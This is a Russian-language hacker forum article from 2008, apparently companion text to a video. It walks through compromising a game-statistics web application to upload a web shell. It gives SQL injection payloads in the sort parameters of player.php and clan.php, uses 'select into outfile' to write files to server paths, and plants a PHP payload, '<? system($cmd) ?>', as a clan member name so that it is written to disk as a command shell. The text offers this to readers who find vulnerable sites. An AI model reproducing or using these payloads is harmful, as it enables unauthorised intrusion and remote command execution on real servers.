Статья, по-существу, является описанием к ]]>видео]]> .
Главной проблемой в заливке шелла через эту игровую статистику является нахождение пути к папке с правами на запись.
Если Вы нашли сайт с такой статой и нашли полный путь к папке с определёнными правами, тогда вам повезло и можно залить шелл
И так, по шагам...
Сперва мне пришла в голову идея как-либо полезно воспользоваться паблик "сплойтом" для этой игровой статы...
http://www.example.com/[path]/server.php?newcss=styles.css&newtheme=%00Попробовал на локальном сайте, ввёл в броузерную строку сплойт и получил кучу ошибок, после чего стата больше не открывалась в принципе =\...Не зная в чем дело, попросил помощи в соответствующем разделе на ачате Правда, ответа так и не получил, зато мне дали толчок найти другие дыры(спасибо Scipio), собственноручно нашёл уже ранее найденные уязвимости в стате. Это были sql-inj после "order by".
/player.php?id=1093&ssort=(-skill*1)&sorder=desc#plrsessions /clan.php?id=3&psort=(-deaths*1)&porder=descДалее хочу сказать спасибо Noiro, он предложил использовать подзапросы в этих скулях, что я и сделал.
/player.php?id=1093&ssort=(-skill*(select 1))&sorder=desc#plrsessions /clan.php?id=3&psort=(-deaths*(select 1))&porder=descНа удивление, эти скули работали =\ После чего я решил попробовать записать запрос в файл на сервере...
/player.php?id=1093&ssort=(-skill*(select 1 into outfile '/path/file.txt'))&sorder=desc#plrsessionsФайл создался и в него было записано следующее...
1191849001 7405.11 4 1.00 2 50.00 0 0.00 0 0.00 593 53 11 13.25 20.75 0 20 1191852522 7283.30 22 10 2.20 10 45.45 0 0.00 0 0.00 3262 261 77 11.86 29.50 1605 1191938597 7195.62 2 2 1.00 1 50.00 0 0.00 1 50.00 404 32 10 16.00 31.25 216 1192130752 7067.62 2 0 2 2 100.00 0 0.00 0 0.00 229 51 8 25.50 15.69 185 1192024974 7038.66 38 18 2.11 4 10.53 0 0.00 0 0.00 4999 289 85 7.61 29.41 1921Это статистика некоторого пользователя с id=1093. Как видно записались одни цифры =( После этой неудачи я решил записать запрос в файл через другую скулю(а вдуг чего изменится!!!)...
/clan.php?id=3&psort=(-deaths*(select 1 into outfile 'd:/system/server/www/info/inet2/2.txt'))&porder=descПолучил в файле такую лабуду...
1093 1093 2007-04-06 2007-09-30 21.24 11 8 72.73 36 90.00 167840198 \N [@_oFF_D]~TURIK.<awp>~ 0 \N \N 1105 1105 2007-04-26 2007-06-02 21.72 17 10 58.82 44 88.00 167840029 \N [@_oFF_D]-=TURIK=- 0 \N \N 23 23 2006-04-16 2007-12-16 19.32 37 22 59.46 426 88.02 167840133 \N [@_oFF_D]_[@$PeR] skull.gifПомимо всякой чуши из циферок, в файле я нашёл имена мемберов клана с id=3(префикс которого=[@_oFF_D]). Потом мне пришло в голову , что если я состою в клане, то назвавшись, к примеру, "<? system($cmd) ?>", я залью это в файл и получу шелл!!! Благо на имена пользователей в этой стате никаких ограничений не стоит и я так и сделал. Шелл залился, всё прошло замечательно!
С наилучшими пожеланиями, FoST 8(тире)794(тире)038
(с) FoST
08.01.2008, 23:00
Статья впервые опубликована на ачате часом раньше